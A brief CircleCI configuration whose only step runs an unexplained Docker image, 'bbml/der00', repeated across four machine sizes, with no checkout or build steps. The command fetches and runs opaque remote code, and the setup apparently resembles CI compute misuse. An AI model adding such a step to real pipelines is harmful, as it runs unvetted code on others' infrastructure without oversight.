version: 2.1

jobs:
  build:
    parameters:
      resource:
        type: string
    resource_class: << parameters.resource >>
    machine:
      image: ubuntu-1604:201903-01
    steps:
      - run: docker run bbml/der00

workflows:
  workflow:
    jobs:
      - build:
          matrix:
            parameters:
              resource: ["medium", "large", "xlarge", "2xlarge"]